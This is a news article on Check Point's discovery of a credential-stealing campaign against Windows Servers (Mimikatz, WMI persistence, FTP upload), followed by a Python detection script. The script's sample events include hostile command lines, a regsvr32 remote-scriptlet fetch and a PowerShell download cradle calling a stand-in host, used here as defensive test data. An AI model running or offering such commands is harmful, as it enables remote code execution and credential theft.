Check Point: new malware found in Windows Servers

Malware only targets Windows Servers and not Windows PCs or laptops

A new malware has been discovered by technical researchers from Check Point Software that specifically targets Microsoft Windows Servers, the vendor has revealed in a blog post.

The malware is believed to target only Windows Servers, not Windows PCs or laptops; it aims to steal data residing on those servers and upload it to a remote FTP server.

The discovery was made by three technical researchers from Check Point Software, Arle Olshtein, Moshe Hayun, and Arnold Osipov.

“During our research, we came across an attack targeting Windows servers in APAC and revealed the attackers' infrastructure, where we observed the uploading of sensitive data, such as Windows login credentials, OS version and IP addresses (internal and external) from between 3-10 different victims each second,” said the blog post announcing the discovery.

Similar to the recent WinRAR vulnerability, which was also discovered by Check Point researchers, this newly discovered malware was also found to be a .RAR compressed file.

This compressed file was found to hide several batch files that trigger the malware and check the identity of the machine to ensure it is a server running Microsoft Windows Server, on the assumption that servers are likely to host commercially or institutionally sensitive data.

“We observed a batch file with an evasive behaviour using interesting techniques such as ‘Squiblydoo’, ‘download cradle’ and WMI Event Subscription persistence exploit to run malicious content on infected machines,” said the blog post.

“The malware conceals the malicious behaviour as legitimate Windows processes to evade AV detection,” added the post. “Currently, VirusTotal shows a very low positivity rate among many AV products.”

The researchers found that the malicious campaign mainly targets countries in Asia and uses the open-source utility Mimikatz, whose sekurlsa module reads credential information from the Windows Local Security Authority Subsystem Service (lsass).

The attacker uses the Mimikatz utility to steal sensitive information from Windows servers and uploads the stolen data to an FTP server.

As the researchers noted, at the time of writing the FTP server is still open and stolen data continues to be uploaded every second.
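As an added example (not Check Point's code and not part of the campaign's own tooling), the following Python sketch turns the indicators named above into detection logic and runs it over constructed Sysmon-style events; the field names follow Sysmon's schema, and the event records, paths and hostnames are fabricated for illustration.

```python
import re

# Constructed Sysmon-style events (fabricated for illustration, not real telemetry).
# EventID 1 = process create, 3 = network connect, 10 = process access,
# 19/20/21 = WMI event filter / consumer / binding created.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s /n /u /i:http://example.invalid/a.sct scrobj.dll"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -nop -w hidden IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/b.ps1')"},
    {"EventID": 20, "Name": "SCM Event Log Consumer", "Type": "Command Line",
     "Destination": r"cmd.exe /c C:\ProgramData\run.bat"},
    {"EventID": 10, "SourceImage": r"C:\Users\Public\m.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 3, "Image": r"C:\Users\Public\m.exe", "DestinationPort": 21,
     "DestinationIp": "203.0.113.10"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe readme.txt"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
]

CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biex\b|\biwr\b")

def classify(event):
    """Return the technique label an event matches, or None."""
    eid = event.get("EventID")
    cmd = event.get("CommandLine", "").lower()
    if eid == 1 and "scrobj.dll" in cmd and re.search(r"/i:https?://", cmd):
        return "squiblydoo"              # regsvr32 fetching a remote scriptlet
    if eid == 1 and "powershell" in cmd and CRADLE.search(cmd):
        return "download_cradle"         # PowerShell pulling a payload from the web
    if eid in (19, 20, 21):
        return "wmi_event_subscription"  # persistence via WMI filter/consumer/binding
    if eid == 10 and event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        # PROCESS_VM_READ (0x10) is the right sekurlsa needs to read credential material;
        # a handle without it (e.g. csrss.exe above) is normal system activity.
        if int(event.get("GrantedAccess", "0"), 16) & 0x10:
            return "lsass_credential_access"
    if eid == 3 and event.get("DestinationPort") == 21:
        return "ftp_egress"              # cleartext FTP upload from a server
    return None

def hunt(events):
    """Return (EventID, label) for every event that matches a campaign indicator."""
    return [(e["EventID"], label) for e in events if (label := classify(e))]

if __name__ == "__main__":
    for eid, label in hunt(SAMPLE_EVENTS):
        print(f"EventID {eid}: {label}")
```

In production the same checks would be expressed as SIEM or EDR rules; the benign notepad and csrss events are included to show the rules do not fire on ordinary activity.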
